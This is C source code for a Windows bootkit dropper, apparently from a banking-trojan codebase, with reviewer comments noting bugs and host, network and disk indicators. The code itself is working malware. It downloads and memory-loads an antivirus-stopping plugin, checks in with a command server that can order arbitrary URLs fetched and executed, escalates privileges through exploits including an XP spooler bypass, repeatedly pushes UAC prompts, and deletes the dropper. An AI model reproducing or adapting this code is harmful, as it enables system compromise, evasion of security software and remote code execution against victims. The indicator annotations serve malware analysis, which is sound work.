// Returns the full path of msinfo32.exe as a heap string (caller frees with STR::Free),
// or NULL when GetVersionExA fails.
//   NT 5.x (major version 5): <ProgramFiles>\Common Files\Microsoft Shared\MSInfo\msinfo32.exe
//   anything else:            <system directory>\msinfo32.exe
PCHAR GetPathToMsInfo32()
{
    int FolderId = CSIDL_SYSTEM;
    const char* PathSuffix = "\\";
    OSVERSIONINFOEXA ver;
    m_memset(&ver, 0, sizeof(ver));
    ver.dwOSVersionInfoSize = sizeof(ver);
    if (!(BOOL)pGetVersionExA(&ver))
        return NULL;
    if (ver.dwMajorVersion == 5)
    {
        // Only the major version is compared, so every NT 5.x release takes this branch.
        FolderId = CSIDL_PROGRAM_FILES;
        PathSuffix = "\\Common Files\\Microsoft Shared\\MSInfo\\";
    }
    PCHAR Path = STR::Alloc(2 * MAX_PATH);
    // NOTE(review): the memset length is STR::Length() of the freshly allocated buffer, not the
    // 2 * MAX_PATH allocation size; how much is cleared depends on what STR::Alloc returns.
    m_memset(Path, 0, STR::Length(Path));
    // Neither the STR::Alloc result nor this call's result is checked before the concatenations.
    pSHGetSpecialFolderPathA(NULL, Path, FolderId, false);
    m_lstrcat(Path, PathSuffix);
    m_lstrcat(Path, "msinfo32.exe");
    return Path;
}
// Single-instance check at host level: tries to own a named mutex
// "Global\" + MutexPrefix + MakeMachineID().
// The mutex is created with a NULL DACL (unrestricted access) so it can be opened from any
// session. On success the handle is deliberately kept open and never released for the life of
// the process; on failure the handle is closed.
// Returns true when ownership was obtained within 1000 ms.
// Host indicator: a Global\ mutex whose name ends in the machine ID.
bool TryToCatchHostLevelInstanceMutex(const char* MutexPrefix)
{
    CHAR mutex_name[200];
    m_memset(mutex_name, 0, sizeof(mutex_name));
    PCHAR machine_id = MakeMachineID();
    // Three concatenations into a fixed 200-byte buffer; no length check.
    m_lstrcat(mutex_name, "Global\\");
    m_lstrcat(mutex_name, MutexPrefix);
    m_lstrcat(mutex_name, machine_id);
    STR::Free(machine_id);
    LDRDBG("TryToCatchHostLevelInstanceMutex", "Mutex name '%s'.", mutex_name);
    // Security descriptor with a present-but-NULL DACL: everyone gets full access to the mutex.
    SECURITY_ATTRIBUTES sa;
    SECURITY_DESCRIPTOR sd;
    pInitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
    pSetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
    sa.nLength = sizeof (SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = &sd;
    sa.bInheritHandle = FALSE;
    HANDLE mutex_handle = (HANDLE)pCreateMutexA(&sa, FALSE, mutex_name);
    if (mutex_handle == NULL)
        return false;
    // Catch ownership of mutex and never release
    DWORD wait_result = (DWORD)pWaitForSingleObject(mutex_handle, 1000);
    if (wait_result == WAIT_OBJECT_0)
        return true;
    pCloseHandle(mutex_handle);
    return false;
}
// Deletes Internet Explorer cookie files (*.txt) from the current user's Cookies folder.
// os selects the profile layout:
//   1 -> "C:\Documents and Settings\<user>\Cookies\"
//   2 -> "C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Cookies\"
// The drive letter and profile root are hard-coded rather than taken from the environment.
// hCab is passed straight to DeleteFiles (its role is not visible here).
// Returns 0 on success and also when GetUserNameA fails; -1 for an unknown os value.
int DeleteIECookies(int os, HCAB hCab)
{
    char username[256];
    DWORD name_len = 256;
    if(!(BOOL)pGetUserNameA(&username[0], &name_len))
        return 0;
    //return 10;
    char *Path_cookies = NULL;
    switch(os)
    {
    case 1:
        // NOTE(review): the allocation is sized for "\\Cookies" while "\\Cookies\\" is appended,
        // and no byte is reserved for the terminator beyond what name_len already covers.
        Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Documents and Settings\\")+name_len+m_lstrlen("\\Cookies"));
        m_lstrcpy(Path_cookies,"C:\\Documents and Settings\\");
        m_lstrcat(Path_cookies,&username[0]);
        m_lstrcat(Path_cookies,"\\Cookies\\");
        break;
    case 2:
        // Same sizing pattern as case 1.
        Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Users\\")+name_len+m_lstrlen("\\AppData\\Roaming\\Microsoft\\Windows\\Cookies"));
        m_lstrcpy(Path_cookies,"C:\\Users\\");
        m_lstrcat(Path_cookies,&username[0]);
        m_lstrcat(Path_cookies,"\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\");
        break;
    default:
        return -1;
    }
    // Path_cookies is never freed.
    DeleteFiles(Path_cookies, "*.txt", true, false, hCab);
    /* Earlier hand-rolled FindFirstFile/DeleteFile loop, superseded by DeleteFiles():
    if(Path_cookies == NULL) return -1;
    WIN32_FIND_DATA data;
    char *Path_cookies_find = (char*)MemAlloc(m_lstrlen(Path_cookies)+2);
    m_lstrcpy(Path_cookies_find,Path_cookies);
    m_lstrcat(Path_cookies_find,"\\*");
    HANDLE nFindFile = FindFirstFile(Path_cookies_find,&data);
    if(nFindFile==NULL) return -1;
    do
    {
        if(m_lstrcmp(data.cFileName,".")==0 || m_lstrcmp(data.cFileName,"..")==0) continue;
        char *Path_file = (char*)MemAlloc(m_lstrlen(Path_cookies)+m_lstrlen(data.cFileName)+1);
        m_lstrcpy(Path_file,Path_cookies);
        m_lstrcat(Path_file,"\\");
        m_lstrcat(Path_file,data.cFileName);
        if(!DeleteFile(Path_file)) { DWORD err = pGetLastError(); }
        //MemFree(Path_file);
    } while(FindNextFile(nFindFile,&data));
    FindClose(nFindFile);
    //MemFree(Path_cookies);
    */
    return 0;
}
// Writes the global Manifest[] string table to FileName, one entry per line (CRLF).
// The entries are concatenated into a fixed 1024-byte heap buffer with no length check.
// Returns the result of File::WriteBufferA.
BOOL SaveManifest(PCHAR FileName)
{
    PCHAR manifest = STR::Alloc(1024);
    BOOL ret;
    manifest[0] = 0;
    for ( int i =0; i< sizeof(Manifest)/sizeof(Manifest[0]); ++i)
    {
        m_lstrcat(manifest,Manifest[i]);
        m_lstrcat(manifest,"\r\n");
    };
    ret = File::WriteBufferA(FileName,manifest,m_lstrlen(manifest));
    STR::Free(manifest);
    return ret;
};
// Thread body: fetch the "stop AV" plugin from the current host and load it in memory.
//  - Returns immediately if the file named by GetStopAVPath() already exists (marker / kill switch).
//  - Builds <host>/cfg/stopav.plug (the path is spelled out as a char array rather than a string
//    literal) into a fixed 256-byte stack buffer with no length check.
//  - Retries DownloadInMem every 5 minutes until it succeeds; there is no give-up condition.
//  - Writes the raw download to GetMiniAVPath() (on-disk artifact), decrypts it with
//    DecryptPlugin, loads it from memory via MemoryLoadLibrary and unloads it straight away.
// Network indicator: HTTP request for /cfg/stopav.plug. Disk indicators: the GetStopAVPath()
// and GetMiniAVPath() files. BotModule is never freed. Always returns 0.
DWORD WINAPI AvBlockThread( LPVOID lpData )
{
    if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES )
    {
        return 0;
    }
    char *Host = GetCurrentHost();
    if ( Host == NULL )
    {
        return 0;
    }
    char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0};
    char AvBlockUrl[256];
    m_lstrcpy( AvBlockUrl, Host );
    m_lstrcat( AvBlockUrl, AvBlockFile );
    LPBYTE BotModule = NULL;
    DWORD dwModuleSize = 0;
    // 5-minute retry loop; the only exit is a successful download.
    while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) )
    {
        pSleep( 1000 * 60 * 5 );
    }
    if ( BotModule != NULL && dwModuleSize )
    {
        // Persist an unmodified copy of the download before decrypting it.
        LPVOID FileData = MemAlloc( dwModuleSize + 1 );
        if ( FileData )
        {
            m_memcpy( FileData, BotModule, dwModuleSize );
            File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize );
            MemFree( FileData );
        }
        LPVOID Module = DecryptPlugin( BotModule, dwModuleSize );
        if ( Module )
        {
            // In-memory load (no LoadLibrary / no image on disk), released right after loading.
            HMEMORYMODULE hLib = MemoryLoadLibrary( Module );
            if ( hLib == NULL )
            {
                return 0;
            }
            MemoryFreeLibrary( hLib );
        }
    }
    return 0;
}
// Writes the MD5 hex string of <drive root of the Windows directory>\ntldr into Buffer and
// returns Buffer; returns NULL when the hash is empty or BufferSize < 33 (32 hex chars + NUL).
// Buffer is zeroed (BufferSize bytes) before the size check, so a too-small buffer is still
// cleared. The GetWindowsDirectoryA result is not checked.
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize)
{
    CHAR path[MAX_PATH];
    pGetWindowsDirectoryA(path, MAX_PATH);
    // Keep only "X:\" of the Windows directory, then append the boot loader file name.
    path[3] = '\0';
    m_lstrcat(path, "ntldr");
    m_memset(Buffer, 0, BufferSize);
    string md5 = MD5StrFromFileA(path);
    if (md5.IsEmpty())
        return NULL;
    if (BufferSize < 33)
        return NULL;
    m_lstrcat(Buffer, md5.t_str());
    return Buffer;
}
//
// Fills the two global path buffers used by the dropper:
//   FileToDelete - ANSI path of the running module (its own executable, removed later);
//   PathBkFile   - <CSIDL_COMMON_APPDATA>\<MachineID>, the "bootkit installed" marker file
//                  (ExplorerMain writes it after a successful install).
// Both are converted from wide to ANSI with CP_ACP. No return code is checked and the
// MakeMachineID() string is not freed.
// Disk indicator: a file named after the machine ID under the common application-data folder.
//
VOID GetPaths()
{
    BOOL bUsed;
    PWCHAR buf = (PWCHAR)MemAlloc(sizeof(WCHAR)*MAX_PATH);
    if ( buf )
    {
        pGetModuleFileNameW(NULL,buf,MAX_PATH-1);
        //pOutputDebugStringW(buf);
        pWideCharToMultiByte(CP_ACP,0,buf,-1,FileToDelete,sizeof(FileToDelete)-1,NULL,&bUsed);
        //pOutputDebugStringA(FileToDelete);
        PP_DPRINTF(L"GetPaths: FileToDelete='%S'", FileToDelete);
        buf[0]= 0;
        pSHGetSpecialFolderPathW(NULL,buf,CSIDL_COMMON_APPDATA ,TRUE);
        pWideCharToMultiByte(CP_ACP,0,buf,-1,PathBkFile,sizeof(PathBkFile)-1,NULL,&bUsed);
        MemFree(buf);
        m_lstrcat(PathBkFile,"\\");
        m_lstrcat(PathBkFile,MakeMachineID());
        PP_DPRINTF(L"GetPaths: PathBkFile='%S'",PathBkFile);
    };
};
// Builds the name of the "bootkit signal" file: <system drive root> + the part of the generated
// UID that STR::GetRightStr(UID, "0") returns. Caller frees the result with STR::Free.
// The same construction is repeated inline in ExplorerMain(), which also creates the file.
// GetSystemDirectoryA's result is not checked.
PCHAR GetBootkitSignalFileName()
{
    PCHAR Path= STR::Alloc(MAX_PATH);
    PCHAR UID=STR::Alloc(120);
    pGetSystemDirectoryA(Path,MAX_PATH);
    GenerateUid(UID);
    // Truncate the system directory to its drive root "X:\".
    Path[3]='\0';
    PCHAR Pref= STR::GetRightStr(UID,"0");
    m_lstrcat(Path, Pref);
    STR::Free(Pref);
    STR::Free(UID);
    return Path;
}
/************************************************************************/
/* TODO (original author): add the matching free for every MemAlloc in this procedure. */
// Deletes IE cookie data for the current user.
//   bDeleteCookiesIndex - delete Cookies\index.dat first.
//   bDeleteCookies      - enumerate the WinINet cache with the "cookie:" pattern and delete every
//                         entry; when FALSE the function returns right after index.dat handling.
// Returns TRUE when enumeration ends with ERROR_NO_MORE_ITEMS (or after index.dat only),
// FALSE on any other enumeration error.
BOOL Delete_IECookies_Norm(BOOL bDeleteCookies, BOOL bDeleteCookiesIndex)
{
    DbgMsg("Delete_IECookies_Norm",0,"START");
    char szUserProfile[200];
    char szFilePath[200];
    HANDLE hCacheEnumHandle = NULL;
    LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
    DWORD dwSize = 4096; // initial buffer size
    // Delete index.dat if requested. Be sure that index.dat is not locked.
    if(bDeleteCookiesIndex)
    {
        // Retrieve from environment user profile path.
        pExpandEnvironmentStringsA("%userprofile%", &szUserProfile[0], sizeof(szUserProfile));
        m_memset(&szFilePath[0], 0, sizeof(szFilePath));
        //m_memcpy(&szFilePath[0],&szUserProfile[0], m_wcslen(&szUserProfile[0])*sizeof(WCHAR));
        //m_memcpy(&szFilePath[m_wcslen(&szUserProfile[0])],L"\\Cookies\\index.dat", 36);
        m_lstrcpy(&szFilePath[0], &szUserProfile[0]);
        m_lstrcat(&szFilePath[0], "\\Cookies\\index.dat");
        // wsprintfW(szFilePath, L"%s%s", szUserProfile, L"\\Cookies\\index.dat");
        // NOTE(review): this literal overwrites the %userprofile%-based path built just above, so
        // the file actually deleted is fixed to the "User" profile on C: - looks like a test leftover.
        m_lstrcpy(&szFilePath[0], "C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat");
        pDeleteFileA(szFilePath);
        DbgMsg("Delete_IECookies_Norm",0,&szFilePath[0]);
        DWORD err = pGetLastError();
        DbgMsg("Delete_IECookies_Norm",err,"pDeleteFileW");
        if(!bDeleteCookies)
            return TRUE;
    }
    // Enable initial buffer size for cache entry structure.
    //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
    lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);   // result not NULL-checked
    lpCacheEntry->dwStructSize = dwSize;
    // URL search pattern (1st parameter) options are: "cookie:", "visited:",
    // or NULL ("*.*").
    // First, obtain handle to internet cache with FindFirstUrlCacheEntry
    // for later use with FindNextUrlCacheEntry.
    hCacheEnumHandle = pFindFirstUrlCacheEntryA(_T("cookie:") /* in */, lpCacheEntry /* out */, &dwSize /* in, out */);
    if(hCacheEnumHandle != NULL)
    {
        pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
        DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
    }
    else
    {
        switch(pGetLastError())
        {
        case ERROR_INSUFFICIENT_BUFFER:
            MemFree(lpCacheEntry);
            //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
            lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
            lpCacheEntry->dwStructSize = dwSize;
            // Repeat first step search with adjusted buffer, exit if not
            // found again (in practice one buffer's size adjustment is
            // always OK).
            // NOTE(review): the retry passes NULL instead of "cookie:", so after a buffer resize
            // the enumeration covers the whole cache, not only cookie entries.
            hCacheEnumHandle = pFindFirstUrlCacheEntryA(NULL, lpCacheEntry, &dwSize);
            if(hCacheEnumHandle != NULL)
            {
                pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
                DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
                break;
            }
            else
            {
                // FindFirstUrlCacheEntry fails again, return.
                MemFree(lpCacheEntry);
                return FALSE;
            }
        default:
            // hCacheEnumHandle is still NULL on this path.
            pFindCloseUrlCache(hCacheEnumHandle);
            MemFree(lpCacheEntry);
            return FALSE;
        }
    }
    // Next, use hCacheEnumHandle obtained from the previous step to delete
    // subsequent items of cache.
    do
    {
        // Notice that return values of FindNextUrlCacheEntry (BOOL) and
        // FindFirstUrlCacheEntry (HANDLE) are different.
        if((BOOL)pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize))
        {
            pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
            DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
        }
        else
        {
            switch(pGetLastError())
            {
            case ERROR_INSUFFICIENT_BUFFER:
                //lpCacheEntry =
                //(LPINTERNET_CACHE_ENTRY_INFO);
                MemFree(lpCacheEntry);
                //new char[dwSize];
                lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
                lpCacheEntry->dwStructSize = dwSize;
                // Repeat next step search with adjusted buffer, exit if
                // error comes up again (in practice one buffer's size
                // adjustment is always OK).
                if(pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize))
                {
                    pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
                    DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
                    break;
                }
                else
                {
                    // FindNextUrlCacheEntry fails again, return.
                    pFindCloseUrlCache(hCacheEnumHandle);
                    MemFree(lpCacheEntry);
                    return FALSE;
                }
                break;
            case ERROR_NO_MORE_ITEMS:
                pFindCloseUrlCache(hCacheEnumHandle);
                MemFree(lpCacheEntry);
                return TRUE;
            default:
                pFindCloseUrlCache(hCacheEnumHandle);
                MemFree(lpCacheEntry);
                return FALSE;
            }
        }
    } while (TRUE);
    return FALSE; // never here
}
// Check-in with the server at Url: POSTs "id=<uid><LoadExe>" and, if the first reply line starts
// with "multidownload", fetches and runs every "http:" URL listed in the reply.
//  - Url is split by ParseUrl1 into Host/Path/Port; Host and Path are never freed.
//  - wsprintfA is resolved through GetProcAddressEx by hash (0xEA3AF0D7 as written) rather than by name.
//  - The User-Agent is taken from ObtainUserAgentString (the system browser's UA string).
//  - LoadExe is a global "&plugins=..." list; the MD5 of each URL handled here is appended to it
//    ("|"-separated) so the next check-in reports what was fetched.
//  - Each URL is passed with a GetTempName() file name to ExecuteFile.
// Network indicators: HTTP/1.0 POST with "Accept: text/html" and "Connection: Close", form body
// "id=...&plugins=...", reply beginning "multidownload" followed by "|"-separated http: URLs.
// On the MyConnect failure path HttpPacket leaks; on the MySend failure path the socket is not closed.
// Returns true only when the full exchange completed.
bool ReportToPlugin( char *Url )
{
    WSADATA wsa;
    if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
    {
        return false;
    }
    char *Host = NULL;
    char *Path = NULL;
    int Port = 0;
    if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
    {
        return false;
    }
    char Uid[100];
    GenerateUid( Uid );
    typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
    fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
    char *UserAgent = NULL;
    UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;
    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
    // NOTE(review): the NULL test comes after the buffer has already been passed to
    // ObtainUserAgentString, and a NULL UserAgent would then be handed to MemFree.
    if ( UserAgent == NULL )
    {
        MemFree( UserAgent );
        UserAgent = "-";
    }
    char Request[] = "POST %s HTTP/1.0\r\n"
                     "Host: %s\r\n"
                     "User-Agent: %s\r\n"
                     "Accept: text/html\r\n"
                     "Connection: Close\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Content-Length: %d\r\n\r\n";
    char Args[] = "id=";
    char *HttpPacket = NULL;
    HttpPacket = (char*)MemAlloc( 2048 );
    // Content-Length = len("id=") + len(Uid) + len(LoadExe); 9 is len("&plugins=") for the
    // case where LoadExe has not been created yet.
    int iTmp;
    if (LoadExe!=NULL)
    {
        iTmp=m_lstrlen(LoadExe);
    }
    else
        iTmp=9;
    pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
    m_lstrcat( HttpPacket, Args );
    m_lstrcat( HttpPacket, Uid );
    if (LoadExe==NULL)
    {
        LoadExe = (char*)MemAlloc(10);
        m_lstrncpy(LoadExe,"&plugins=",9);
        LoadExe[9]='\0';
    }
    m_lstrcat( HttpPacket, LoadExe );
    SOCKET Socket = MyConnect1( Host, Port );
    if( Socket == -1 )
    {
        return false;
    }
    bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
    MemFree( HttpPacket );
    if ( !b )
    {
        return false;
    }
    DWORD dwSize = 0;
    char *Buffer = RecvAndParse( Socket, &dwSize );
    if ( !Buffer )
    {
        pclosesocket( Socket );
        return false;
    }
    // Command keyword spelled as a char array rather than a string literal.
    char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
    char *Context;
    // Terminates the first reply line in place; only that line is compared below.
    m_strtok_s( Buffer, "\r\n", &Context );
    if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
    {
        char * cPointer= m_strstr(&Buffer[1],"http:");   // unused
        char* cUrl=Buffer;
        char* cUrlNext;
        int i;
        char *DownloadUrl;
        // Walk the "|"-separated URL list that follows the keyword.
        while (true)
        {
            cUrl= m_strstr(&cUrl[1],"http:");
            if (cUrl==NULL)break;
            // NOTE(review): cUrlNext is NULL for the last URL when there is no trailing "|";
            // the copy length then depends on how m_lstrlen treats NULL.
            cUrlNext= m_strstr(cUrl,"|");
            i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
            // NOTE(review): the "+1" is applied to the pointer MemAlloc returns, not to the
            // size it is given; the same shifted pointer is later passed to MemFree.
            DownloadUrl = (char*)MemAlloc(i)+1;
            m_lstrncpy(DownloadUrl,cUrl,i);
            DownloadUrl[i]='\0';
            if ( DownloadUrl )
            {
                // Grow LoadExe by one 32-char MD5 plus separator and record this URL's hash.
                LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
                m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
                m_lstrcat( LoadExe, "|");
                WCHAR *FileName =(WCHAR *)GetTempName();
                if ( FileName && DownloadUrl )
                {
                    ExecuteFile( DownloadUrl, FileName );
                }
                MemFree( FileName );
            }
            MemFree( DownloadUrl );
        }
    }
    MemFree( Buffer );
    pclosesocket( Socket );
    return true;
}
// Routine run after injection into another process. Checks its own privileges, tries to
// extend them, and drives the bootkit install (ExplorerMain) through an escalating sequence:
//   1. not admin -> TakePrivileges() (results 0 and 2 count as failure), then ExplorerMain();
//   2. admin, install failed, no exploit used yet -> TakePrivileges() again and retry;
//   3. still failed, running as an EXE on NT 5.x -> write the "DROPER_DLL" section to a temp
//      file and pass it to SpoolerBypass();
//   4. still failed -> copy itself to <temp dir>\<DROPER_NAME_PREFIX><tmpname>.exe with a
//      side-car .manifest (SaveManifest) and launch it via ShellExecuteEx with ARGV_UAC_RUN,
//      up to 10 prompts per copy, repeating until PathBkFile exists;
//   5. one more ExplorerMain(), then a DeleteDropper thread; ExitProcess when dwExplorerSelf is set.
// Detection notes: repeated UAC prompts for a freshly copied EXE plus a matching .manifest in the
// temp directory; a temp file handed to the spooler on XP; creation of the PathBkFile marker.
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
    //
    // Deletion runs on a separate thread because removing the dropper can take over a minute.
    //
    BOOL bRun = TRUE;
    BOOL bRet = FALSE;
    BOOL IsUsedExploit = FALSE;
    OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};
    UnhookDlls();
    BuildImport((PVOID)GetImageBase());
    PP_DPRINTF(L"ExplorerRoutine: started");
    if (! IsUserAdmin() )
    {
        PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
        switch ( TakePrivileges() )
        {
        case 0:
        case 2:
            bRun = FALSE;
            break;
        };
        PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
        IsUsedExploit = TRUE; // in theory this is always TRUE
    };
    if ( bRun )
    {
        PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
        bRet = ExplorerMain();
        PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
    }
    /* If we have admin rights but did not use the exploits and the install failed,
       use the exploits and install again */
    if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
    {
        PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");
        IsUsedExploit = TRUE;
        switch ( TakePrivileges() )
        {
        case 0:
        case 2:
            bRun = FALSE;
            break;
        };
        if ( bRun )
        {
            PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
            bRet = ExplorerMain();
            PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
        }
    };
    pGetVersionExA(&OSVer);
    /* Drop the DLL to disk and use the spooler exploit, XP only */
    if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
    {
        PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");
        DWORD DropSize = 0;
        PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize);
        if ( DropImage && DropSize)
        {
            PCHAR DropFile = File::GetTempNameA();
            File::WriteBufferA(DropFile,DropImage,DropSize);
            SpoolerBypass(DropFile);
            STR::Free(DropFile);
        };
    };
    /* Launch a copy of the dropper over and over, asking for elevated rights. */
    if ( bRet == FALSE )
    {
        PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");
        PCHAR tmpexe,dir,file ;
        PCHAR tmp_manifest;
        PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
        if ( NamePrefix )
        do
        {
            tmpexe = File::GetTempNameA();
            tmp_manifest = STR::Alloc(MAX_PATH+1);
            dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
            file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
            if ( tmp_manifest && dir && file)
            {
                STR::Free(tmpexe);
                // <dir>\<prefix><tmpname>.exe and, initially, <same>.manifest
                tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
                if ( ! tmpexe ) return 0;   // tmp_manifest, dir, file and NamePrefix leak here
                m_lstrcpy(tmp_manifest,tmpexe);
                m_lstrcat(tmp_manifest,".manifest");
            };
            if ( tmpexe && tmp_manifest )
            if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
            {
                DWORD dwCode = -1;
                SHELLEXECUTEINFOA ExecInfo;   // NOTE(review): only four members are set; the rest is uninitialized stack
                // tmp_manifest is reused as the command line: "<tmpexe> <ARGV_UAC_RUN>".
                m_lstrcpy(tmp_manifest,tmpexe);
                m_lstrcat(tmp_manifest," ");
                m_lstrcat(tmp_manifest,ARGV_UAC_RUN);
                ExecInfo.cbSize = sizeof(ExecInfo);
                ExecInfo.lpFile = tmpexe;
                ExecInfo.lpParameters = tmp_manifest;
                ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
                // Up to 10 prompts per copy; stops at the first child that exits with code 0.
                for ( int i = 0; i < 10; ++i )
                {
                    PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);
                    if ( pShellExecuteExA(&ExecInfo) == FALSE ) break;
                    pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
                    pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);   // ExecInfo.hProcess is never closed
                    if ( dwCode == 0 )
                    {
                        PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
                        break;
                    }
                }
            };
            if ( tmpexe ) STR::Free(tmpexe);
            if ( tmp_manifest ) STR::Free(tmp_manifest);
            if ( dir ) STR::Free(dir);
            if ( file ) STR::Free(file);
        } while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do; loop until the bootkit marker file appears
        if ( NamePrefix ) STR::Free(NamePrefix);
    };
    /* If the install failed, try once more in case it works this time */
    if ( bRet == FALSE)
    {
        PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
        bRet = ExplorerMain();
        PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
    }
    /* Delete the dropper */
    PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
    pCloseHandle(StartThread(DeleteDropper,NULL));
    if ( dwExplorerSelf )
    {
        PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
        pExitProcess(0);
    }
    return 0;
}
// After the checks, fires the "explorer start" event in the Explorer process, which in turn
// triggers the BkDll (bootkit DLL) install.
//  - If PathBkFile does not exist: calls ExplorerStart(NULL); on success writes 4 bytes (the BOOL
//    value 1) to PathBkFile as the "installed" marker.
//  - If PathBkFile already exists: treats the install as done.
//  - On success either way: creates the "signal" file <system drive>\<UID tail after "0"> holding
//    sizeof(PCHAR) bytes (the address of the Path string). Per the original comment, the ring-3
//    bot that launched this dropper looks for that file and then removes itself from autorun.
//  - Only after a fresh install: starts RebootThread and RebootNotifyThread.
// Disk indicators: PathBkFile; a tiny file with a UID-derived name in the system drive root.
BOOL ExplorerMain()
{
    BOOL ret = FALSE;
    bool BkInstalledSuccess = false;
    PP_DPRINTF(L"ExplorerMain: started");
    // Trigger the explorer start event
    if ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES)
    {
        PP_DPRINTF(L"ExplorerMain: BkFile not exists. Runing ExplorerStart()");
        if ( ExplorerStart(NULL) )
        {
            ret = TRUE;
            BkInstalledSuccess = true;
            PP_DPRINTF(L"ExplorerMain: ExplorerStart() finished successfuly. Saving 0x00000001 in '%S'", PathBkFile);
            // Write 4 bytes holding the value 1 into BkFile.
            File::WriteBufferA(PathBkFile,&ret,sizeof(BOOL));
        }
    }
    else
    {
        PP_DPRINTF(L"ExplorerMain: BkFile exists.");
        ret = TRUE;
    };
    if ( ret )
    {
        // If the check finds the Bk file, or the install succeeds, a file is created in the
        // system root holding the 4 bytes of the string's address. The ring-3 bot that launched
        // the bootkit dropper checks for this file; once it finds it, it tries to remove itself
        // from autorun.
        // (Same name construction as GetBootkitSignalFileName().)
        PCHAR Path= STR::Alloc(MAX_PATH);
        PCHAR UID=STR::Alloc(120);
        pGetSystemDirectoryA(Path,MAX_PATH);
        GenerateUid(UID);
        Path[3]='\0';
        PCHAR Pref= STR::GetRightStr(UID,"0");
        m_lstrcat(Path, Pref);
        PP_DPRINTF(L"ExplorerMain: Bk installed. Creating file '%S'", Path);
        // Writes the pointer value itself (&Path, sizeof(PCHAR) bytes), not the string's characters.
